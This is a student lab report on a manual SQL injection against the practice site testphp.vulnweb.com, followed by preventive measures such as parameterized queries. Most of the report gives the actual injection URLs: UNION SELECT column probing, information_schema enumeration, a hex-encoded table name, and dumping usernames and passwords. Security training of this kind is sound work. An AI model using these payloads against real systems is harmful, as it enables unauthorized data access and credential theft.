PROJECT TASK 2

Perform a SQL injection manually on http://testphp.vulnweb.com .write a

report along with screenshots and mention preventive steps to avoid SQL
injection.
SQL [ Structured Query Language ] – It will pass the commands indirectly i.e. in the form of url to get
the information from database . Basic SQL Commands are – select , insert into, Delete , Drop , Update/
alter , information_schema.

we need to remember that trough url’s we are sending commands to database and while entering the
commands need to be perfect otherwise it shows error

TARGET :http://testphp.vulnweb.com

STEPS TO PERFORM SQL INJECTION / DATABASE HACKING :

1.First we need to check whether the website is connected to database or not by using the command url -

http://testphp.vulnweb.com/listproducts.php?cat=1

2. Now , to check the vulnerability of website is existed or not we use the co and url –
http://testphp.vulnweb.com/listproducts.php?cat=1’

If it is secured no errors and page will remain same but if changes occur it indicates vulnerability.

We observe some changes in page that means there is vulnerability in there and there are using MYSQL
server but we need to conform that vulnerability then only we can provide report ,so now we will dig
more and more to check user name and password is retrieved or not
3.Here, we going to check how any public columns are available by using command url –

 http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1 or 2 or 3 or etc check until we get

desired info

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12 . at 12 we got error that means

total 11 columns are available in public
4. So now out of 11 to find how many are having loopholes / vulnerability we are using the command url
– http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11

“Out of 11 , 3 columns [7,2,9] are vulnerable”

5. Now we need to find name of the database for that you need to choose one column out of 3 [7,2,9]
Actually database administrator can see all the data but it contains loopholes so we can also see the data.

http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,database(),10,11

we found that database name is “ACUART”

6.After getting database we required table names from database ,we need to identify how many tables
are available

Using url - http://testphp.vulnweb.com/listproducts.php?cat=1 union select

1,2,3,4,5,6,7,8,group_concat(table_name),10,11 from information_schema. Tables where
table_schema=database()

We got table names artists , carts , categ , featured . guestbook , pictures , products , “users”

My target = users
7. Now need to find columns from user table [columns are nothing but first name, last name, email id etc
For that we are using url – http://testphp.vulnweb.com/listproducts.php?cat=1 union select
1,2,3,4,5,6,7,8,group concat(column_name),10,11 from information_schema.columns where
table_name=0x7573657273

We used bypass technique string to hex converter to encode [users ] into numerical form

Now we get the data like uname, pass, cc, address, email, name ,Phone, cart
Out of that we need username and password

8.we need information regarding user name and password so for that we are using the url –
http://testphp.vulnweb.com/listproducts.php?cat=1 union select
1,2,3,4,5,6,7,8,group_concat(uname,0x2f,pass),10,11 from users

We use string to hex converter for symbol to differentiate between username and password

Finally ,we get username /password = “test/test”

PREVENTIVE STEPS TO AVOID SQL INJECTIONS :

To prevent SQL injections, consider implementing the following steps:

 Use Prepared Statements and Parameterized Queries*: These ensure that user input is treated
as data, not executable code.
CODE: SELECT * FROM users WHERE username = ? AND password = ?
 Stored Procedures: Use stored procedures on the database side, which separates data from code.
CODE: EXECUTE getUserCredentials @username, @password
 Input Validation: Validate and sanitize all user inputs, rejecting any input that does not
conform to expected formats.
 Escaping Inputs: Properly escape all user-supplied input using functions provided by your
database library.
 Least Privilege Principle: Grant the minimum permissions necessary to the database user
account used by your application.
 Database Configuration: Disable or limit features like dynamic SQL execution and ensure
error messages do not reveal database structure or queries.
 Web Application Firewalls (WAFs): Implement WAFs to provide an additional layer of
defense against SQL injection attempts
 Regular Security Audits: Conduct regular security audits and code reviews to identify and fix
potential vulnerabilities
 Error Handling: Implement proper error handling to ensure that error messages do not expose
sensitive information.

By following these measures, you can significantly reduce the risk of SQL injection attacks on your
applications.